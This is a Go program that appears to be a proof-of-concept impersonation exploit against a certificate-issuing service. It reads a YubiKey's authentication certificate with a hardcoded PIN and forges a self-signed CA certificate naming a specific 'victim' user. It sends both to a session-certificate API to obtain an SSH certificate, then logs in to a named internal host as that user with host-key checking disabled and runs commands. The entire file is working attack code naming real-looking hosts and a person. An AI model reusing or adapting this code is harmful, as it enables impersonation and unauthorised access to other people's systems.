package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"os"
	"time"

	"github.com/go-resty/resty/v2"
	"golang.org/x/crypto/ssh"

	"a.yandex-team.ru/security/libs/go/piv"
)

const (
	yubiPIN    = "12345678"
	victimUser = "e-sidorov"
	victimHost = "coverity2.sec.yandex.net:22"
)

type SessionCertSignReq struct {
	Type        string `json:"type"`
	YkCert      []byte `json:"yk_cert"`
	SessionCert []byte `json:"session_cert"`
	Robot       string `json:"robot_name,omitempty"`
	TTL         int    `json:"desired_ttl,omitempty"`
	StTicketID  string `json:"st_ticket_id,omitempty"`
	Comment     string `json:"comment,omitempty"`
}

func fatalf(format string, args ...interface{}) {
	_, _ = fmt.Fprintf(os.Stderr, "inposter:"+format+"\n", args...)
	os.Exit(1)
}

func ykCert() ([]byte, error) {
	crt := &x509.Certificate{
		SerialNumber: big.NewInt(int64(time.Now().Year())),
		Subject: pkix.Name{
			CommonName:         victimUser,
			Country:            []string{"RU"},
			Province:           []string{"Moscow"},
			Locality:           []string{"Moscow"},
			Organization:       []string{"Yandex"},
			OrganizationalUnit: []string{"Infra"},
		},
		NotBefore:             time.Now(),
		NotAfter:              time.Now().AddDate(25, 0, 0),
		IsCA:                  true,
		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
		KeyUsage:              x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign,
		BasicConstraintsValid: true,
	}

	privKey, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}

	out, err := x509.CreateCertificate(rand.Reader, crt, crt, &privKey.PublicKey, privKey)
	if err != nil {
		return nil, err
	}

	return out, nil
}

func main() {
	card, err := piv.Open("Yubico YubiKey FIDO+CCID 00 00")
	if err != nil {
		fatalf("can't open yubikey: %v", err)
	}
	defer card.Close()

	cert, err := card.Certificate(piv.SlotAuthentication)
	if err != nil {
		fatalf("can't get 0x9a cert: %v", err)
	}

	signer, err := card.PrivateKey(piv.SlotAuthentication, cert.PublicKey, piv.KeyAuth{PIN: yubiPIN})
	if err != nil {
		fatalf("can't get 0x9a priv key: %v", err)
	}

	ykCertBytes, err := ykCert()
	if err != nil {
		fatalf("failed to generate ykCert: %v", err)
	}

	rsp, err := resty.New().
		SetDebug(true).
		SetBaseURL("https://crt.cloud.yandex.net").
		R().
		SetBody(&SessionCertSignReq{
			Type:        "yc-user",
			YkCert:      ykCertBytes,
			SessionCert: cert.Raw,
		}).
		Post("/api/session_certificate")

	if err != nil {
		fatalf("request failed: %v", err)
	}

	fmt.Println("--- cert issued ---")
	sshCert, _, _, _, err := ssh.ParseAuthorizedKey(rsp.Body())
	if err != nil {
		fatalf("invalid ssh cert: %v", err)
	}

	sshSigner, err := ssh.NewSignerFromKey(signer)
	if err != nil {
		fatalf("can't create ssh signer: %v", err)
	}

	certSigner, err := ssh.NewCertSigner(sshCert.(*ssh.Certificate), sshSigner)
	if err != nil {
		fatalf("can't create ssh cert signer: %v", err)
	}

	sshClient, err := ssh.Dial("tcp", victimHost, &ssh.ClientConfig{
		User: victimUser,
		Auth: []ssh.AuthMethod{
			ssh.PublicKeys(certSigner),
		},
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
	})

	if err != nil {
		fatalf("dial failed: %v", err)
	}

	session, err := sshClient.NewSession()
	if err != nil {
		fatalf("can't open ssh session: %v", err)
	}
	defer session.Close()

	out, err := session.CombinedOutput("bash -xc 'id; hostname'")
	if err != nil {
		fatalf("command failed: %v", err)
	}

	fmt.Printf("\n--- response from %q ---\n", victimHost)
	fmt.Println(string(out))
}
